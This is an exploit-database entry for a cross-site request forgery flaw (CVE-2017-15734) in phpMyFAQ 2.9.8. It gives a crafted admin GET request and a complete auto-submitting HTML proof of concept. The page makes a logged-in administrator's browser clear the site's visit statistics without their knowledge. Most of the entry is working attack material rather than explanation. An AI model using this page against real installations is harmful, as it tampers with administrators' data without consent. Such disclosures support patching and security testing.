# Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15734
PoC:
Get http://phpmyfaq/admin/index.php?action=clear-visits
Reproduction: While still logged in, open another browser window to access the link.
Some Details:
{
"Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.",
"File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php",
"Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.",
"Request Parameters": "action=clear-visits",
"Request Method": "GET",
"Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits",
"Final PoC": "<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>"
}
[Replace Your Domain Name]
